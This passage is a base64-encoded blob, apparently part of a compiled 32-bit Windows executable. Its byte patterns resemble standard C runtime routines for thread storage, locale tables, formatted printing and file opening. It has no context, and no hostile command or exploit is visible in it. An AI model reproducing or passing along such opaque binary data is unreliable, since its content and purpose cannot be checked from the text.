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IAABmg/hvD4T/BwAAZoP4dQ+E9QcAAGaD+HgPhOsHAABmg/hYD4ThBwAAg6XM+///AIuFxPv//1GNteD7///Hhdj7//8BAAAA6Oz7//9Z6bgHAAAPt8GD+GQPjzACAAAPhL0CAACD+FMPjxsBAAB0foPoQXQQK8J0WSvCdAgrwg+F7AUAAIPBIMeFpPv//wEAAACJjeT7//+Djfj7//9Ag730+///AI21/Pv//7gAAgAAibXw+///iYXs+///D42NAgAAx4X0+///BgAAAOnpAgAA94X4+///MAgAAA+FyQAAAION+Pv//yDpvQAAAPeF+Pv//zAIAAB1B4ON+Pv//yCLvfT7//+D//91Bb////9/g8ME9oX4+///IImd6Pv//4tb/Imd8Pv//w+EBQUAAIXbdQuhOBxBAImF8Pv//4Ol7Pv//wCLtfD7//+F/w+OHQUAAIoGhMAPhBMFAACNjbT7//8PtsBRUOiA+v//WVmFwHQBRkb/hez7//85vez7//980OnoBAAAg+hYD4TwAgAAK8IPhJUAAACD6AcPhPX+//8rwg+FxgQAAA+3A4PDBDP2RvaF+Pv//yCJtdj7//+Jnej7//+JhZz7//90QoiFyPv//42FtPv//1CLhbT7///Ghcn7//8A/7CsAAAAjYXI+///UI2F/Pv//1Dou/j//4PEEIXAfQ+JtbD7///rB2aJhfz7//+Nhfz7//+JhfD7//+Jtez7///pQgQAAIsDg8MEiZ3o+///hcB0OotIBIXJdDP3hfj7//8ACAAAD78AiY3w+///dBKZK8LHhdj7//8BAAAA6f0DAACDpdj7//8A6fMDAAChOBxBAImF8Pv//1Doqff//1np3AMAAIP4cA+P9gEAAA+E3gEAAIP4ZQ+MygMAAIP4Zw+O6P3//4P4aXRtg/hudCSD+G8Pha4DAAD2hfj7//+AibXk+///dGGBjfj7//8AAgAA61WLM4PDBImd6Pv//+gj9///hcAPhFb6///2hfj7//8gdAxmi4Xg+///ZokG6wiLheD7//+JBseFsPv//wEAAADpwQQAAION+Pv//0DHheT7//8KAAAA94X4+///AIAAAA+EqwEAAAPei0P4i1P86ecBAAB1EmaD+Wd1Y8eF9Pv//wEAAADrVzmF9Pv//34GiYX0+///gb30+///owAAAH49i730+///gcddAQAAV+ii9f//WYuN5Pv//4mFqPv//4XAdBCJhfD7//+Jvez7//+L8OsKx4X0+///owAAAIsDg8MIiYWU+///i0P8iYWY+///jYW0+///UP+1pPv//w++wf+19Pv//4md6Pv//1D/tez7//+NhZT7//9WUP81WBxBAOhC4f//Wf/Qi534+///g8QcgeOAAAAAdCGDvfT7//8AdRiNhbT7//9QVv81ZBxBAOgS4f//Wf/QWVlmg73k+///Z3Uchdt1GI2FtPv//1BW/zVgHEEA6Ozg//9Z/9BZWYA+LXURgY34+///AAEAAEaJtfD7//9W6Qj+//+JtfT7///Hhaz7//8HAAAA6ySD6HMPhGr8//8rwg+Eiv7//4PoAw+FyQEAAMeFrPv//ycAAAD2hfj7//+Ax4Xk+///EAAAAA+Eav7//2owWGaJhdD7//+Lhaz7//+DwFFmiYXS+///iZXc+///6UX+///3hfj7//8AEAAAD4VF/v//g8ME9oX4+///IHQc9oX4+///QImd6Pv//3QGD79D/OsED7dD/JnrF/aF+Pv//0CLQ/x0A5nrAjPSiZ3o+///9oX4+///QHQbhdJ/F3wEhcBzEffYg9IA99qBjfj7//8AAQAA94X4+///AJAAAIvai/h1AjPbg730+///AH0Mx4X0+///AQAAAOsag6X4+///97gAAgAAOYX0+///fgaJhfT7//+LxwvDdQYhhdz7//+Ntfv9//+LhfT7////jfT7//+FwH8Gi8cLw3Qti4Xk+///mVJQU1fouKf//4PBMIP5OYmdkPv//4v4i9p+BgONrPv//4gOTuu9jYX7/f//K8ZG94X4+///AAIAAImF7Pv//4m18Pv//3RZhcB0B4vOgDkwdE7/jfD7//+LjfD7///GATBA6zaF23ULoTwcQQCJhfD7//+LhfD7///Hhdj7//8BAAAA6wlPZoM4AHQGA8KF/3XzK4Xw+///0fiJhez7//+DvbD7//8AD4VlAQAAi4X4+///qEB0K6kAAQAAdARqLesOqAF0BGor6waoAnQUaiBYZomF0Pv//8eF3Pv//wEAAACLndT7//+Ltez7//8r3iud3Pv///aF+Pv//wx1F/+1xPv//42F4Pv//1NqIOiE9f//g8QM/7Xc+///i73E+///jYXg+///jY3Q+///6Iv1///2hfj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